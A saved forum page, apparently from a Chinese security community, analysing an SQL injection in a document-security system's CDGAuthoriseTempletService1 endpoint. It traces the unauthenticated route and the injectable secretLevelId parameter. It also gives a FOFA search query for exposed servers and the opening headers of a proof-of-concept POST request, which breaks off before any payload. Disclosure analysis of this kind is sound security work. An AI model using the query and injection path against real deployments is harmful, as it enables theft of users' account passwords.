MVptMi4wOSwyNy4yOFY1OS43NmgxOS4zN3Y3LjM2Yy4xMSwzLjgzLTEuNjcsNS42OC01LjM1LDUuNTdabTUuNDgtNGg2LjQ1YzEuMzkuMDksMi4wNS0uNjEsMi0yLjA5VjYzLjc4aC04LjQxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE1My42Nyw1OC43MlY1NC41M2g0LjY5VjUwLjMxaDYuNTJ2NC4yMmgxNS42OVY1MC4zMWg2LjUzdjQuMjJoNC44MXY0LjE5aC01LjA2YTE1LjM2LDE1LjM2LDAsMCwxLTcuNTcsMTEuODgsOTIuNiw5Mi42LDAsMCwwLDEyLjIxLDIuMzR2NHEtMTIuMTMtMS4yNS0xOC43OC0zLjQ3LTYuNTcsMi4yMi0xOC43LDMuNDd2LTRhMTA0LDEwNCwwLDAsMCwxMi4xNy0yLjM0LDE1LjA2LDE1LjA2LDAsMCwxLTcuNTctMTEuODhabTM2LjYxLTE2Ljg2djcuMzZoLTYuMTVWNDZIMTYxLjM3djMuMjJoLTYuMTVWNDEuODZoMTMuODlWMzkuMDloNy4ydjIuNzdaTTE3Mi43NSw2OC4yMXE2LjY5LTMuMTgsNy42MS05LjQ5SDE2NS4wOVExNjUuOTMsNjUsMTcyLjc1LDY4LjIxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE5OSw3N1Y1Mi43M2EyNywyNywwLDAsMS0zLjQ3LDEuNDNWNTAuMzVhMTcuMiwxNy4yLDAsMCwwLDUuOS0xMWg1LjlhMzIuODYsMzIuODYsMCwwLDEtMi42OCw3LjdWNzdabTcuNzQtMzF2LTRoMTBWMzkuM2g2Ljd2Mi43NmgxMC4xMnY0Wm0xLjM0LDMwLjVWNjIuMjNIMjMxLjd2Ny43cS4xNyw2LjgxLTYuMTUsNi42MVptLjEzLTI0di0zLjhoMjMuNDJ2My44Wm0wLDYuN1Y1NS40MWgyMy40MnYzLjgxWm0xNy44NiwxMC42MlY2Ni4ySDIxMy43MXY2LjMyaDEwLjEyQzIyNS4zOSw3Mi42MywyMjYuMTMsNzEuNzQsMjI2LjA1LDY5Ljg0WiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTIzNy43Niw0Ni40NnYtNGgxNC40OHY0SDI0OFY2NS4yNGMxLjQyLS4zLDMtLjcxLDQuNzMtMS4yMXY0LjE0YTU1LjQxLDU1LjQxLDAsMCwxLTE1LjE0LDMuNzdWNjYuNzljMS4yNS0uMDgsMi43OC0uMjQsNC42LS40NlY0Ni40NlptMTMuNDMsOC4wN1Y1MC44MXE0LjY5LTQsNS40NC0xMS41NWg2LjExYTMyLjMxLDMyLjMxLDAsMCwxLTEuMDUsNC40NGgxMy43N3Y0aC0zcS0uODQsMTEuODUtNS44NiwxOC4yYTQzLjI2LDQzLjI2LDAsMCwwLDguNDksNi44MnY0LjQ0YTQ5LjQxLDQ5LjQxLDAsMCwxLTEyLTcuNTMsNTIuMTMsNTIuMTMsMCwwLDEtMTIuNjQsNy41N1Y3Mi44MUE0MC4wNyw0MC4wNywwLDAsMCwyNTkuNzMsNjZhMzQuMzgsMzQuMzgsMCwwLDEtNS42MS0xMi44QTIxLjc4LDIxLjc4LDAsMCwxLDI1MS4xOSw1NC41M1ptOC4yNS0zLjcyYTM2LjQsMzYuNCwwLDAsMCwzLjc2LDEwLjVxMi43MS00Ljg5LDMuNDMtMTMuNTZIMjU5LjlhMTUuMSwxNS4xLDAsMCwxLTIuNDcsMy4wNloiLz48cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Ik0yODAuNTYsNzYuOTFWNDAuNjRoMTMuNzN2NGEyNS4
<style>a{color:#009a61;text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}.navbar-inverse{background-color:#2a8c70;border-color:#2b7a5c}.navbar-inverse .navbar-nav>li>a{color:#fff;padding-left:6px;padding-right:6px}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#008151}@media (max-width:767px){}@media (max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#E7F2ED;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}.btn-primary{border-color:#008151;background-color:#009a61;color:#fff}.btn-primary.active,.btn-primary:active,.btn-primary:focus,.btn-primary:hover,.open>.btn-primary.dropdown-toggle{border-color:#00432a;background-color:#006741;color:#fff}.btn-primary.active,.btn-primary:active,.open>.btn-primary.dropdown-toggle{background-image:none}.btn-success{border-color:#4cae4c;background-color:#5cb85c;color:#fff}</style>
<style>@font-face{font-family:qax-design-icons;src:/* original URL: https://forum.butian.net/static/js/qaxd/fonts/qax-design-icons.woff */url(data:font/woff;base64,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
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}@media print{}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#FFEBE9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#ffffff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body a{background-color:transparent;color:var(--color-accent-fg);text-decoration:none}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:0.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body a:hover{text-decoration:underline}.markdown-body h2{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body a:not([href]){color:inherit;text-decoration:none}.markdown-body p{margin-top:0;margin-bottom:16px}.markdown-body code{padding:0.2em 0.4em;margin:0;font-size:85%;background-color:var(--color-neutral-muted);border-radius:6px}.markdown-body ::-webkit-calendar-picker-indicator{-webkit-filter:invert(50%);filter:invert(50%)}</style>
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
<!--[if lt IE 9]>
<script src="/static/js/html5shiv.min.js"></script>
<script src="/static/js/respond.min.js"></script>
<![endif]-->
<style>.hot{z-index:10}</style>
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media (max-height:620px){}@media (max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media (pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:tra
<body>
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-9 col-md-9 col-lg-9">
<div class=navbar-header>
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
</button>
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
</div>
<div class="collapse navbar-collapse" id=global-navbar>
<ul class="nav navbar-nav">
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
<li><a href=https://forum.butian.net/questions>问答</a></li>
<li><a href=https://forum.butian.net/shop>商城</a></li>
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
<li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
<span class=hot>NEW</span>
</li>
<li><a href=https://forum.butian.net/movable>活动</a></li>
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
</li>
</ul>
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
<input type=text name=word id=searchBox class=form-control placeholder value>
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">某通文档xxx系统sql注入分析</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
某通文档xxx系统sql注入分析
</div>
<textarea id=md_view_content style=display:none value='一.漏洞描述
------
某通文档xxx系统(简称CDG)是一款综合性的数据智能安全产品主要用于保护电子文档的安全某通文档xxx系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。攻击者可以通过构造特定的 POST 请求注入恶意 SQL 代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息。
资产测绘搜索语句
--------
fofa:
body="/CDGServer3/index.jsp"
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-94ff8d81f8d8dfa1291e4e5b7f8a11bb474854b0.png)
二.影响厂商产品
--------
某通文档xxx系统version&amp;lt;5.6.3.152.179受影响。
三.漏洞分析
------
漏洞点快速查找拿到源代码后根据某步平台给出路径CDGAuthoriseTempletService1查找相关类文件
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-d5d7a5e4f9adee6a228688514aaa778d76c17d63.png)
文件路径为:\\tomcat\\webapps\\CDGServer3\\WEB-INF\\lib\\jhiberest.jar!\\com\\esafenet\\servlet\\service\\document\\CDGAuthoriseTempletService1.class
首先分析下路由与鉴权
分析web.xml配置文件
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-539562c95e7f14bb76a9d1a9c97bfaa7e9114431.png)
在该漏洞版本的代码中,该/CDGAuthoriseTempletService1/接口路径未设置serssion效验
对比新版代码里的xml文件显而易见已增加效验
![520c4b79117734ab774e7de6479a8d5.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a303d39f5c5bbfbf6a7cdfe42a4154534ae8c02f.png)
GetCDGAuthoriseTemplet gcat = (GetCDGAuthoriseTemplet)this.xStream.fromXML(toServerXML);
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4e5ad1e5d3391586820b6e22a6d90c4a0b821c8e.png)
继续分析漏洞点,使用`XStream`库将名为`toServerXML`的XML字符串解析成`GetCDGAuthoriseTemplet`类型的Java对象并将这个对象赋值给名为`gcat`的变量
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e57b9dac07b92f35819d6ce0bfd2ef44763252dd.png)
跟进代码发现调⽤validateInfo对其进⾏检查验证用户ID`userId`和密级ID`secretLevelId`的有效性进入else需要返回true才行所以我们要知道一个一定存在用户名默认系统用户为SystemAdmin
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c6cb0c1f7aec76c094aa68c020aeb840a63c3080.png)
继续跟进发现调⽤ getAuthoriseTempletList 方法
,发现此处进行拼接查询
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-9a27a3265f2f27797b5e1057a4c263e59537a790.png)
userId固定注入参数为secretLevelId构造xml数据包
![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-e073ff8052f213b2f82f5e3b338c6670a2634b5c.png)
需要利用工具加密
poc
POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1
Host: x
Content-Type: application/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
